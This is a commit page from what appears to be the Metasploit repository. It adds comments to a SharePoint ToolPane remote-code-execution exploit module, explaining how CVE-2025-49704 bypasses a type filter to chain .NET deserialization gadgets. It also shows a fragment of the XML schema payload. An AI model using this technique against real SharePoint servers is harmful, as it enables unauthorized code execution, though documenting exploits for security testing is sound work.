Skip to content

Commit 8df7f64

Browse files
sfewer-r7sfewer-r7
committed
add some comments to clarify what CVE-2025-49704 is
1 parent 6d9d9a7 commit 8df7f64

File tree

1 file changed

+3
-0
lines changed

1 file changed

+3
-0
lines changed

modules/exploits/windows/http/sharepoint_toolpane_rce.rb

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -166,6 +166,9 @@ def self.generate(nested_gadget_b64)
166166
name_b = Rex::Text.rand_text_alpha_lower(8..16)
167167
name_c = Rex::Text.rand_text_alpha_lower(8..16)
168168

169+
# The msdata:DataType attribute below is CVE-2025-49704, and allows bypassing a filter list so we can instantiate
170+
# LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document below, allowing us to kcik off a second
171+
# stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
169172
schema = <<~EOF
170173
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="#{name_a}">
171174
<xs:element name="#{name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">

0 commit comments

Comments
 (0)